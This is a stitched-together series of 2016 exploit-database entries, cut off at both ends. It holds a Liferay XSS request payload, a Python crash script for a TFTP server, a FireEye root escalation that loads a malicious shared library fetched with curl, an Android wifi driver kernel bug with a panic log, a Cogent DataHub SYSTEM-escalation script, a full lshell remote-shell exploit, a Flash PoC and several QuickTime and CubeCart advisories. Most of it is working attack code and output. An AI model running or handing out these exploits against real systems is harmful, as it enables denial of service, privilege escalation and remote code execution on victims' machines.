_79_cmd=update&_79_tabs2=display&_79_tabs3=email-addresses&_79_tabs4=phone-numbers&_79_redirect=http%3A%2F%2Flocalhost%3A8082%2Fuser%2Ftest%2Fhome%3Fp_p_id%3D79%26p_p_lifecycle%3D0%26p_p_state%3Dmaximized%26p_p_mode%3Dview%26_79_struts_action%3D%252Fenterprise_admin%252Fedit_user%26_79_tabs2%3Ddisplay%26_79_tabs3%3Demail-addresses%26_79_tabs4%3Dphone-numbers%26_79_backURL%3Dhttp%253A%252F%252Flocalhost%253A8082%252Fuser%252Ftest%252Fhome%253Fp_p_id%253D79%2526p_p_lifecycle%253D0%2526p_p_state%253Dmaximized%2526p_p_mode%253Dview%2526_79_struts_action%253D%25252Fenterprise_admin%25252Fview%2526_79_tabs1%253Dusers%2526_79_tabs2%253D%2526_79_tabs3%253D%2526_79_keywords%253D%2526_79_advancedSearch%253Dfalse%2526_79_andOperator%253Dtrue%2526_79_firstName%253D%2526_79_middleName%253D%2526_79_lastName%253D%2526_79_screenName%253D%2526_79_emailAddress%253D%2526_79_active%253Dtrue%2526_79_organizationId%253D0%2526_79_roleId%253D0%2526_79_userGroupId%253D0%2526_79_cur%253D1%26_79_p_u_i_d%3D&_79_backURL=http%3A%2F%2Flocalhost%3A8082%2Fuser%2Ftest%2Fhome%3Fp_p_id%3D79%26p_p_lifecycle%3D0%26p_p_state%3Dmaximized%26p_p_mode%3Dview%26_79_struts_action%3D%252Fenterprise_admin%252Fview%26_79_tabs1%3Dusers%26_79_tabs2%3D%26_79_tabs3%3D%26_79_keywords%3D%26_79_advancedSearch%3Dfalse%26_79_andOperator%3Dtrue%26_79_firstName%3D%26_79_middleName%3D%26_79_lastName%3D%26_79_screenName%3D%26_79_emailAddress%3D%26_79_active%3Dtrue%26_79_organizationId%3D0%26_79_roleId%3D0%26_79_userGroupId%3D0%26_79_cur%3D1&_79_p_u_i_d=10301&_79_tabs1TabsScroll=&_79_screenName=user&_79_emailAddress=user%40xyz.com&_79_prefixId=&_79_firstName=John&_79_middleName=&_79_lastName=Hopkins&_79_suffixId=&_79_birthdayMonth=0&_79_birthdayDay=1&_79_birthdayYear=1970&_79_male=1&_79_organizationIds=&_79_organizationNames=&_79_jobTitle=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&_79_tabs2TabsScroll=&_79_languageId=en_US&_79_timeZoneId=Pacific%2FMidway&_79_greeting=Welcome+John+Hopkins%21&_79_password1=&_79_password2=&_79_passwordReset=false&_79_tabs3TabsScroll=&_79_tabs4TabsScroll=&_79_openId=&_79_smsSn=&_79_aimSn=&_79_icqSn=&_79_jabberSn=&_79_msnSn=&_79_skypeSn=&_79_ymSn=&_79_facebookSn=&_79_mySpaceSn=&_79_twitterSn=&_79_announcementsTypegeneralEmail=false&_79_announcementsTypegeneralSms=false&_79_announcementsTypegeneralWebsite=true&_79_announcementsTypegeneralWebsiteCheckbox=on&_79_announcementsTypenewsEmail=false&_79_announcementsTypenewsSms=false&_79_announcementsTypenewsWebsite=true&_79_announcementsTypenewsWebsiteCheckbox=on&_79_announcementsTypetestEmail=false&_79_announcementsTypetestSms=false&_79_announcementsTypetestWebsite=true&_79_announcementsTypetestWebsiteCheckbox=on&_79_tabs1TabsScroll=&_79_comments=
3. Solution:
Issue has been resolved in newer versions. Upgrade to 6.1 CE or newer.
# Exploit Title: TallSoft SNMP TFTP Server 1.0.0 - DoS
# Date: 28-03-2016
# Software Link: http://www.tallsoft.com/snmp_tftpserver.exe
# Exploit Author: Charley Celice (stmerry)
# Contact: https://twitter.com/charleycelice
#
# Credits: Based off TallSoft Quick TFTP Server 2.2 DoS
# * https://www.exploit-db.com/exploits/26010/
#
# Category: Denial of Service
# Tested on: Windows XP SP3 English
# Details: Remotely crash TallSoft SNMP TFTP Server
from socket import *
import sys, select
address = ('127.0.0.1', 69)
# sufficient for the crash to work
crash = "\x00\x02\x00"
crash += "\x41"*1019
server_socket = socket(AF_INET, SOCK_DGRAM)
server_socket.sendto(crash, address)
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=670
The mip user is already quite privileged, capable of accessing sensitive network data. However, as the child process has supplementary gid contents, there is a very simple privilege escalation to root. This is because the snort configuration is writable by that group:
$ ls -l /data/snort/config/snort.conf
-rw-rw-r-- 1 fenet contents 1332 Dec 2 18:02 /data/snort/config/snort.conf
This can be exploited by placing a shared library in a writable directory that is mounted with the “exec” option, and appending a “dynamicengine” directive to the snort configuration.
# mount | grep -v noexec | grep rw
...
/dev/sda8 on /var type ext4 (rw,noatime)
/dev/sda11 on /data type ext4 (rw,noatime)
/dev/sda9 on /data/db type ext4 (rw,noatime,barrier=0)
tmpfs on /dev/shm type tmpfs (rw)
It looks like /dev/shm is a good candidate for storing a shared library.
First, I create and compile a shared library on my workstation, as there is no compiler available on the FireEye appliance:
$ cat test.c
void __attribute__((constructor)) init(void)
{
system("/usr/bin/id > /tmp/output.txt");
}
$ gcc test.c -shared -s -fPIC -o test.so
Now fetch that object on the FireEye machine, and instruct snort to load it:
fireeye$ curl http://example.com/test.so > /dev/shm/test.so
fireeye$ printf “dynamicengine /dev/shm/test.so\n” >> /data/snort/config/snort.conf
The snort process is regularly restarted to process new rules, so simply wait for the snort process to respawn, and verify we were able to execute commands as root:
fireeye$ cat /tmp/output.txt
uid=0(admin) gid=0(root) groups=0(root)
And now we’re root, with complete control of the FireEye machine. We can load a rootkit, persist across reboots or factory resets, inspect or modify traffic, or perform any other action.
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=678
The wireless driver for the Android One (sprout) devices has a bad copy_from_user in the handling for the wireless driver socket private read ioctl IOCTL_GET_STRUCT with subcommand PRIV_CMD_SW_CTRL.
This ioctl is permitted for access from the untrusted-app selinux domain, so this is an app-to-kernel privilege escalation from any app with android.permission.INTERNET.
See
hello-jni.tar.gz for a PoC (NDK required to build) that should redirect kernel code execution to 0x40404040.
[ 56.843672]-(0)[880:tx_thread]CPU: 0 PID: 880 Comm: tx_thread Tainted: G W 3.10.57-g9e1c396 #1
[ 56.844867]-(0)[880:tx_thread]task: dea3b480 ti: cb99e000 task.ti: cb99e000
[ 56.845731]-(0)[880:tx_thread]PC is at 0x40404040
[ 56.846319]-(0)[880:tx_thread]LR is at kalDevPortWrite+0x1c8/0x484
[ 56.847092]-(0)[880:tx_thread]pc : [<40404040>] lr : [<c0408be4>] psr: a0000013
[ 56.847092]sp : cb99fdb0 ip : c001813c fp : cb99fe0c
[ 56.848705]-(0)[880:tx_thread]r10: c0cac2f0 r9 : 0000af00 r8 : 00000110
[ 56.849552]-(0)[880:tx_thread]r7 : 0000002c r6 : cc0a63c0 r5 : 00000001 r4 : c0cade08
[ 56.850560]-(0)[880:tx_thread]r3 : 40404040 r2 : 00000040 r1 : dd5d0110 r0 : 00000001
[ 56.851570]-(0)[880:tx_thread]Flags: NzCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment kernel
[ 56.852675]-(0)[880:tx_thread]Control: 10c5387d Table: 9e9b006a DAC: 00000015
[ 56.853585]-(0)[880:tx_thread]
[ 56.853585]LR: 0xc0408b64:
[ 56.854297]8b64 e50b3028 e3a03000 e50b3044 0a00008a e590c0d0 e30639ac e34c30a8 e35c0000
[ 56.855306]8b84 01a0c003 e2851103 e30c3940 e34c30bc e7eb2055 e1a01621 e3a05001 e593e000
[ 56.856314]8ba4 e3a03000 e1a01281 e58d3004 e28114ff e58d5000 e1a03008 e08e1001 e59cc010
[ 56.857323]8bc4 e12fff3c e5943014 e3530000 e50b002c 0a000002 e5933018 e1a00005 e12fff33
[ 56.858332]8be4 e59635cc e2867e5a e2877004 e24b1048 e30650c0 e34c50a6 e1a00007 e5933000
[ 56.859340]8c04 e12fff33 e59635cc e1a00007 e5933004 e12fff33 e5959000 e2899f7d e5953000
[ 56.860349]8c24 e30610c0 e1a00007 e34c10a6 e0693003 e3530000 aa00005b e59635cc e5933010
[ 56.861358]8c44 e12fff33 e3500000 0afffff3 e59635cc e1a00007 e30856a1 e3405001 e5933014
[ 56.862369]-(0)[880:tx_thread]
[ 56.862369]SP: 0xcb99fd30:
[ 56.863083]fd30 00000001 00000110 00000000 40404040 a0000013 ffffffff cb99fd9c 00000110
[ 56.864091]fd50 0000af00 c0cac2f0 cb99fe0c cb99fd68 c000e1d8 c00084b8 00000001 dd5d0110
[ 56.865100]fd70 00000040 40404040 c0cade08 00000001 cc0a63c0 0000002c 00000110 0000af00
[ 56.866108]fd90 c0cac2f0 cb99fe0c c001813c cb99fdb0 c0408be4 40404040 a0000013 ffffffff
[ 56.867117]fdb0 00000001 00000000 c07aeeb8 c029c4b0 c0b9d340 00000110 00000000 00000000
[ 56.868126]fdd0 cb99fdf4 cb99fde0 c07aef68 c009d670 9d5d0000 180f002c e54b6168 e54af000
[ 56.869135]fdf0 e54b5d10 00000110 dd5d0000 00000000 cb99fe6c cb99fe10 c03db164 c0408a28
[ 56.870143]fe10 0000af00 00000004 cb99fe44 cb99fe28 c03eddf4 00000001 00007d10 e54b5d14
[ 56.871155]-(0)[880:tx_thread]
[ 56.871155]IP: 0xc00180bc:
[ 56.871868]80bc ee070f36 e0800002 e1500001 3afffffb f57ff04f e1a0f00e ee103f30 e1a03823
[ 56.872877]80dc e203300f e3a02004 e1a02312 e2423001 e1c00003 ee070f3a e0800002 e1500001
[ 56.873885]80fc 3afffffb f57ff04f e1a0f00e ee103f30 e1a03823 e203300f e3a02004 e1a02312
[ 56.874894]811c e2423001 e1c00003 ee070f3e e0800002 e1500001 3afffffb f57ff04f e1a0f00e
[ 56.875902]813c e0811000 e3320002 0affffd0 eaffffe1 e0811000 e3320001 1affffcc e1a0f00e
[ 56.876911]815c 00007fff 000003ff e1a0c00d e92dd830 e24cb004 e1a05000 e1a00001 ebfffe6a
[ 56.877920]817c e1a04000 e1a00005 ebfffe67 e1a01004 e1a05000 eb09bf2a e1a00005 ebfffeaa
[ 56.878929]819c e1a00004 ebfffea8 e89da830 e1a0c00d e92dd818 e24cb004 ebfffe5b e3a01a01
[ 56.879940]-(0)[880:tx_thread]
[ 56.879940]FP: 0xcb99fd8c:
[ 56.880653]fd8c 0000af00 c0cac2f0 cb99fe0c c001813c cb99fdb0 c0408be4 40404040 a0000013
[ 56.881662]fdac ffffffff 00000001 00000000 c07aeeb8 c029c4b0 c0b9d340 00000110 00000000
[ 56.882671]fdcc 00000000 cb99fdf4 cb99fde0 c07aef68 c009d670 9d5d0000 180f002c e54b6168
[ 56.883679]fdec e54af000 e54b5d10 00000110 dd5d0000 00000000 cb99fe6c cb99fe10 c03db164
[ 56.884688]fe0c c0408a28 0000af00 00000004 cb99fe44 cb99fe28 c03eddf4 00000001 00007d10
[ 56.885697]fe2c e54b5d14 e54af000 00000000 cb99fe6c cb99fe48 c03da49c e54b6168 e54af000
[ 56.886705]fe4c c0cac2f0 00000000 e54af000 00000000 c0cac2f0 cb99fe8c cb99fe70 c03bd0f4
[ 56.887714]fe6c c03dae1c 00000001 00000000 e54b6168 00000000 cb99fee4 cb99fe90 c03bd540
[ 56.888726]-(0)[880:tx_thread]
[ 56.888726]R1: 0xdd5d0090:
[ 56.889439]0090 00000002 60070193 c0a9d860 00000001 00000003 0d050d04 60070193 60070193
[ 56.890447]00b0 c0a8d800 00002ab0 cb99fe9c cb99fe50 c00d3a84 c001ee84 0b93115f 00000000
[ 56.891456]00d0 ffffffff 00000000 00000036 00000000 75fd19aa cb99fea0 e54dfac4 e54dfab8
[ 56.892465]00f0 e54dfac4 60070113 cc0a65f8 c0cac730 cc0a6464 c0cac2f0 cb99fec4 062e062d
[ 56.893473]0110 00000000 c2ec5c43 e91cd01a 3ef74ed2 256fb013 c9a73709 0d15c700 aa03b775
[ 56.894482]0130 10b66433 696d6e70 4f66e845 6fc5d5f5 fffd363f a9960104 61007ab4 5b193ffc
[ 56.895491]0150 25b0d02e 7fbf9ac1 c3de7bb9 b7bc184f 47c837ed 0d3b82cd aa3d7d38 72ac0fad
[ 56.896499]0170 a469220b 96e646bc 49677d77 a6fae9d7 2d03b2c7 a52e0556 16f0641d 96c95111
[ 56.897511]-(0)[880:tx_thread]
[ 56.897511]R4: 0xc0cadd88:
[ 56.898224]dd88 c0cadc88 41414141 41414141 41414141 41414141 41414141 41414141 41414141
[ 56.899233]dda8 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
[ 56.900241]ddc8 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
[ 56.901250]dde8 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
[ 56.902259]de08 41414142 41414141 41414141 41414141 41414141 c0cadc90 000001d3 000001d3
[ 56.903267]de28 000001d2 000000ca 000000c7 00000000 00000000 00000000 00000000 00000000
[ 56.904276]de48 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 56.905285]de68 00000000 00000000 c04265ec 00000000 00000000 00000000 00000000 00000000
[ 56.906297]-(0)[880:tx_thread]
[ 56.906297]R6: 0xcc0a6340:
[ 56.907009]6340 00000000 00000000 00000000 dead4ead ffffffff ffffffff cc0a6358 cc0a6358
[ 56.908018]6360 df8f9674 dfba8764 df8f9684 00000001 c0b45604 00000000 00000000 00000000
[ 56.909027]6380 00000001 de764130 00000000 00000000 c080e18c 00000000 00000000 00000000
[ 56.910035]63a0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 56.911044]63c0 dd9e1000 00000000 00000075 0000007f 0000a051 00006107 00000000 00000000
[ 56.912053]63e0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 56.913062]6400 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 56.914070]6420 00000000 cb000000 00000700 00000000 00000000 00000000 00000000 00000000
[ 56.915082]-(0)[880:tx_thread]
[ 56.915082]R10: 0xc0cac270:
[ 56.915806]c270 7f54e330 00000000 7f54e330 00000000 7f5b84c9 00000004 00000000 00000000
[ 56.916814]c290 00000000 00000000 00000001 00000001 00000001 00000000 00000000 00000000
[ 56.917823]c2b0 00000001 00000000 dead4ead ffffffff ffffffff c0cac2c4 c0cac2c4 00000000
[ 56.918832]c2d0 00000000 00000001 600f0113 000c000c dead4ead ffffffff ffffffff 00000000
[ 56.919840]c2f0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 56.920849]c310 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 56.921858]c330 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 56.922866]c350 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 56.923880]-(0)[880:tx_thread]Process tx_thread (pid: 880, stack limit = 0xcb99e248)
[ 56.924845]-(0)[880:tx_thread]Stack: (0xcb99fdb0 to 0xcb9a0000)
[ 56.925584]-(0)[880:tx_thread]fda0: 00000001 00000000 c07aeeb8 c029c4b0
[ 56.926801]-(0)[880:tx_thread]fdc0: c0b9d340 00000110 00000000 00000000 cb99fdf4 cb99fde0 c07aef68 c009d670
[ 56.928016]-(0)[880:tx_thread]fde0: 9d5d0000 180f002c e54b6168 e54af000 e54b5d10 00000110 dd5d0000 00000000
[ 56.929230]-(0)[880:tx_thread]fe00: cb99fe6c cb99fe10 c03db164 c0408a28 0000af00 00000004 cb99fe44 cb99fe28
[ 56.930445]-(0)[880:tx_thread]fe20: c03eddf4 00000001 00007d10 e54b5d14 e54af000 00000000 cb99fe6c cb99fe48
[ 56.931660]-(0)[880:tx_thread]fe40: c03da49c e54b6168 e54af000 c0cac2f0 00000000 e54af000 00000000 c0cac2f0
[ 56.932874]-(0)[880:tx_thread]fe60: cb99fe8c cb99fe70 c03bd0f4 c03dae1c 00000001 00000000 e54b6168 00000000
[ 56.934089]-(0)[880:tx_thread]fe80: cb99fee4 cb99fe90 c03bd540 c03bcf6c 000007d0 cc0a63c0 00000000 00000000
[ 56.935304]-(0)[880:tx_thread]fea0: c000009a cc0a6a50 00000000 00000000 cc0a65f8 80000013 cc0a6464 cc0a63c0
[ 56.936519]-(0)[880:tx_thread]fec0: cc0a6a5c cb99e000 cc0a65f8 c0cac730 cc0a6464 c0cac2f0 cb99ff44 cb99fee8
[ 56.937734]-(0)[880:tx_thread]fee0: c03efce4 c03bd300 dd6b1dd4 a0070013 c0cade28 cb99e028 c0090920 cc0a6a50
[ 56.938948]-(0)[880:tx_thread]ff00: 01a5fc40 00000000 dea3b480 c0090920 cb99ff10 cb99ff10 c03ef9d4 dd5bfdbc
[ 56.940163]-(0)[880:tx_thread]ff20: 00000000 dd9e1000 c03ef9d4 00000000 00000000 00000000 cb99ffac cb99ff48
[ 56.941378]-(0)[880:tx_thread]ff40: c008fadc c03ef9e0 ffffffff 00000000 df9958c0 dd9e1000 00000000 00000000
[ 56.942593]-(0)[880:tx_thread]ff60: dead4ead ffffffff ffffffff cb99ff6c cb99ff6c 00000000 00000000 dead4ead
[ 56.943807]-(0)[880:tx_thread]ff80: ffffffff ffffffff cb99ff88 cb99ff88 dd5bfdbc c008fa20 00000000 00000000
[ 56.945022]-(0)[880:tx_thread]ffa0: 00000000 cb99ffb0 c000e618 c008fa2c 00000000 00000000 00000000 00000000
[ 56.946236]-(0)[880:tx_thread]ffc0: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 56.947452]-(0)[880:tx_thread]ffe0: 00000000 00000000 00000000 00000000 00000013 00000000 ffffffff ffffffff
[ 56.948658]Backtrace:
[ 56.948966]-(0)[880:tx_thread][<c0408a1c>] (kalDevPortWrite+0x0/0x484) from [<c03db164>] (nicTxCmd+0x354/0x638)
[ 56.950213] r9:00000000 r8:dd5d0000 r7:00000110 r6:e54b5d10 r5:e54af000
r4:e54b6168
[ 56.951190]-(0)[880:tx_thread][<c03dae10>] (nicTxCmd+0x0/0x638) from [<c03bd0f4>] (wlanSendCommand+0x194/0x220)
[ 56.952449]-(0)[880:tx_thread][<c03bcf60>] (wlanSendCommand+0x0/0x220) from [<c03bd540>] (wlanProcessCommandQueue+0x24c/0x474)
[ 56.953859] r6:00000000 r5:e54b6168 r4:00000000 r3:00000001
[ 56.954568]-(0)[880:tx_thread][<c03bd2f4>] (wlanProcessCommandQueue+0x0/0x474) from [<c03efce4>] (tx_thread+0x310/0x640)
[ 56.955927]-(0)[880:tx_thread][<c03ef9d4>] (tx_thread+0x0/0x640) from [<c008fadc>] (kthread+0xbc/0xc0)
[ 56.957088]-(0)[880:tx_thread][<c008fa20>] (kthread+0x0/0xc0) from [<c000e618>] (ret_from_fork+0x14/0x3c)
[ 56.958270] r7:00000000 r6:00000000 r5:c008fa20 r4:dd5bfdbc
[ 56.958970]-(0)[880:tx_thread]Code: bad PC value
[ 56.959544]-(0)[880:tx_thread]---[ end trace 1b75b31a2719ed1f ]---
[ 56.960313]-(0)[880:tx_thread]Kernel panic - not syncing: Fatal exception
The vulnerable code is in /drivers/misc/mediatek/conn_soc/drv_wlan/mt_wifi/wlan/os/linux/gl_wext_priv.c:1632
case PRIV_CMD_SW_CTRL:
pu4IntBuf = (PUINT_32)prIwReqData->data.pointer;
prNdisReq = (P_NDIS_TRANSPORT_STRUCT) &aucOidBuf[0];
//kalMemCopy(&prNdisReq->ndisOidContent[0], prIwReqData->data.pointer, 8);
if (copy_from_user(&prNdisReq->ndisOidContent[0],
prIwReqData->data.pointer,
prIwReqData->data.length)) {
status = -EFAULT;
break;
}
prNdisReq->ndisOidCmd = OID_CUSTOM_SW_CTRL;
prNdisReq->inNdisOidlength = 8;
prNdisReq->outNdisOidLength = 8;
/* Execute this OID */
status = priv_set_ndis(prNetDev, prNdisReq, &u4BufLen);
break;
prNdisReq->ndisOidContent is in a static allocation of size 0x1000, and prIwReqData->data.length is a usermode controlled unsigned short, so the copy_from_user results in memory corruption.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39629.zip
/*
# Exploit Title: Cogent Datahub <= 7.3.9 Gamma Script Elevation of Privilege Vulnerability
# Google Dork: lol
# Date: 28/3/2016
# Exploit Author: mr_me
# Vendor Homepage: http://www.cogentdatahub.com/
# Software Link: http://www.cogentdatahub.com/Contact_Form.html
# Version: <= 7.3.9
# Tested on: Windows 7 x86
# CVE : CVE‑2016-2288
sha1sum: c1806faf0225d0c7f96848cb9799b15f8b249792 CogentDataHub-7.3.9-150902-Windows.exe
Advsiory: https://ics-cert.us-cert.gov/advisories/ICSA-16-084-01
Timeline:
=========
- 02/12/2015 : vuln found, case opened to the zdi
- 09/02/2016 : case rejected (not interested in this vuln due to vector)
- 26/02/2016 : reported to ICS-CERT
- 24/03/2016 : advisory released
Notes:
======
- to reach SYSTEM, the service needs to be installed via the Service Manager
- the service doesnt need to be installed, as long as 'C:\Program Files\Cogent\Cogent DataHub\CogentDataHubV7.exe' has been executed by a privileged user
- an attacker does NOT need to restart the machine or the service in order to EP, the service just polls for the Gamma Script
Exploitation:
=============
As a Guest user (or low privileged user) save this file as 'WebstreamSupport.g' into C:\usr\cogent\require\ and enjoy the free SYSTEM calcs. Most OS's dont allow
a write into c:\ as guest, but we are in the SCADA world. Anything is possible.
C:\Users\steven>sc qc "Cogent DataHub"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Cogent DataHub
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\Cogent\Cogent DataHub\CogentDataHubV7.exe" -H "C:\Users\steven\AppData\Roaming\Cogent DataHub"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Cogent DataHub
DEPENDENCIES : RPCSS
SERVICE_START_NAME : LocalSystem
C:\Users\steven>
*/
require ("Application");
require ("AsyncRun"); // thanks to our friends @ Cogent
class WebstreamSupport Application
{
}
method WebstreamSupport.constructor ()
{
RunCommandAsync(nil, nil, "cmd.exe /c calc", "c:\\");
}
Webstream = ApplicationSingleton (WebstreamSupport);
import paramiko
import traceback
from time import sleep
#
# Exploit lshell pathing vulnerability in <= 0.9.15.
# Runs commands on the remote system.
# @dronesec
#
if len(sys.argv) < 4:
print '%s: [USER] [PW] [IP] {opt: port}'%(sys.argv[0])
sys.exit(1)
try:
print '[!] .............................'
print '[!] lshell <= 0.9.15 remote shell.'
print '[!] note: you can also ssh in and execute \'/bin/bash\''
print '[!] .............................'
print '[!] Checking host %s...'%(sys.argv[3])
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if len(sys.argv) == 5:
ssh.connect(sys.argv[3],port=int(sys.argv[4]),username=sys.argv[1],password=sys.argv[2])
else:
ssh.connect(sys.argv[3],username=sys.argv[1],password=sys.argv[2])
# verify lshell
channel = ssh.invoke_shell()
while not channel.recv_ready(): sleep(1)
ret = channel.recv(2048)
channel.send('help help\n')
while not channel.recv_ready(): sleep(1)
ret = channel.recv(2048)
if not 'lshell' in ret:
if 'forbidden' in ret:
print '[-] Looks like we can\'t execute SSH commands'
else:
print '[-] Environment is not lshell'
sys.exit(1)
# verify vulnerable version
channel.send('sudo\n')
while not channel.recv_ready(): sleep(1)
ret = channel.recv(2048)
if not 'Traceback' in ret:
print '[-] lshell version not vulnerable.'
sys.exit(1)
channel.close()
ssh.close()
# exec shell
print '[+] vulnerable lshell found, preparing pseudo-shell...'
if len(sys.argv) == 5:
ssh.connect(sys.argv[3],port=int(sys.argv[4]),username=sys.argv[1],password=sys.argv[2])
else:
ssh.connect(sys.argv[3],username=sys.argv[1],password=sys.argv[2])
while True:
cmd = raw_input('$ ')
# breaks paramiko
if cmd[0] is '/':
print '[!] Running binaries won\'t work!'
continue
cmd = cmd.replace("'", r"\'")
cmd = 'echo __import__(\'os\').system(\'%s\')'%(cmd.replace(' ',r'\t'))
if len(cmd) > 1:
if 'quit' in cmd or 'exit' in cmd:
break
(stdin,stdout,stderr) = ssh.exec_command(cmd)
out = stdout.read()
print out.strip()
except paramiko.AuthenticationException:
print '[-] Authentication to %s failed.'%sys.argv[3]
except Exception, e:
print '[-] Error: ', e
print type(e)
traceback.print_exc(file=sys.stdout)
finally:
channel.close()
ssh.close()
Sources:
https://bugs.chromium.org/p/project-zero/issues/detail?id=716
https://googleprojectzero.blogspot.ca/2016/03/life-after-isolated-heap.html
The bug is an uninitialized variable in the fix to an ActionScript 2 use-after-free bug. Roughly 80 of these types of issues have been fixed by Adobe in the past year, and two uninitialized variable issues were introduced in the fixes.
This issue is fairly easy to reproduce, a proof-of-concept for this issue in its entirety is:
var o = {};
o.unwatch();
The bug occurs because the use-after-free check in the unwatch method attempts to convert its first parameter to a string by calling toString on it before continuing with the part of the method where toString could cause problems by freeing an object. However, Flash does not check that this parameter exists before calling toString on it. In pseudo-code, the rough behaviour of this method is:
void* args = alloca( args_size );
for( int i = 0; i < args_size; i++){
// Init args
}
if ( ((int) args[0]) & 6 == 6 )
args[0] = call_toString( args[0] );
if ( args_size < 1)
exit();
Exploit:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39631.zip
#####################################################################################
Application: Apple Quicktime
Platforms: Windows, OSX
Versions: before version 7.7.79.80.95
Author: Francis Provencher of COSIG
Website: http://www.protekresearchlab.com/
Twitter: @COSIG_ @protekresearch
CVE-2016-1767
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
QuickTime is an extensible multimedia framework developed by Apple Inc., capable of handling various formats of digital video, picture, sound, panoramic images, and interactivity. The classic version of QuickTime is available for Windows Vista and later, as well as Mac OS X Leopard and later operating systems. A more recent version, QuickTime X, is currently available on Mac OS X Snow Leopard and newer.
(https://en.wikipedia.org/wiki/QuickTime)
#####################################################################################
============================
2) Report Timeline
============================
2016-01-07: Francis Provencher from COSIG report issue to Apple security team;
2016-01-13: Apple security team confirmed this issue;
2016-03-22: Apple fixed this issue;
https://support.apple.com/en-us/HT206167
#####################################################################################
============================
3) Technical details
============================
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime.
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
By providing a malformed FPX file, an attacker is able to create controlled memory corruption, and execute code in the context of the current user.
#####################################################################################
===========
4) POC
===========
Proof of Concept:
http://protekresearchlab.com/exploits/COSIG-2016-14.fpx
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39633.zip
###############################################################################
#####################################################################################
Application: Apple Quicktime
Platforms: Windows, OSX
Versions: before version 7.7.79.80.95
Author: Francis Provencher of COSIG
Website: http://www.protekresearchlab.com/
Twitter: @COSIG_ @protekresearch
CVE-2016-1768
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
QuickTime is an extensible multimedia framework developed by Apple Inc., capable of handling various formats of digital video, picture, sound, panoramic images, and interactivity. The classic version of QuickTime is available for Windows Vista and later, as well as Mac OS X Leopard and later operating systems. A more recent version, QuickTime X, is currently available on Mac OS X Snow Leopard and newer.
(https://en.wikipedia.org/wiki/QuickTime)
#####################################################################################
============================
2) Report Timeline
============================
2016-01-07: Francis Provencher from COSIG report issue to Apple security team;
2016-01-13: Apple security team confirmed this issue;
2016-03-22: Apple fixed this issue;
https://support.apple.com/en-us/HT206167
#####################################################################################
============================
3) Technical details
============================
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime.
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
By providing a malformed FPX file, an attacker is able to create controlled memory corruption, and execute code in the context of the current user.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/COSIG-2016-15.fpx
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39634.zip
###############################################################################
#####################################################################################
Application: Apple Quicktime
Platforms: Windows, OSX
Versions: before version 7.7.79.80.95
Author: Francis Provencher of COSIG
Website: http://www.protekresearchlab.com/
Twitter: @COSIG_ @protekresearch
CVE-2016-1769
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
QuickTime is an extensible multimedia framework developed by Apple Inc., capable of handling various formats of digital video, picture, sound, panoramic images, and interactivity. The classic version of QuickTime is available for Windows Vista and later, as well as Mac OS X Leopard and later operating systems. A more recent version, QuickTime X, is currently available on Mac OS X Snow Leopard and newer.
(https://en.wikipedia.org/wiki/QuickTime)
#####################################################################################
============================
2) Report Timeline
============================
2016-01-07: Francis Provencher from COSIG report issue to Apple security team;
2016-01-13: Apple security team confirmed this issue;
2016-03-22: Apple fixed this issue;
https://support.apple.com/en-us/HT206167
#####################################################################################
============================
3) Technical details
============================
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime.
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
By providing a malformed PSD file, an attacker is able to create an out of bound read condition and execute code in the context of the current user or may allow access to sensitive memory space.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/COSIG-2016-16.psd
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39635.zip
###############################################################################
Advisory ID: HTB23298
Product: CubeCart
Vendor: CubeCart Limited
Vulnerable Version(s): 6.0.10 and probably prior
Tested Version: 6.0.10
Advisory Publication: March 2, 2016 [without technical details]
Vendor Notification: March 2, 2016
Vendor Patch: March 16, 2016
Public Disclosure: March 30, 2016
Vulnerability Type: SQL Injection [CWE-89], Cross-Site Scripting [CWE-79], Cross-Site Request Forgery [CWE-352]
Risk Level: Medium
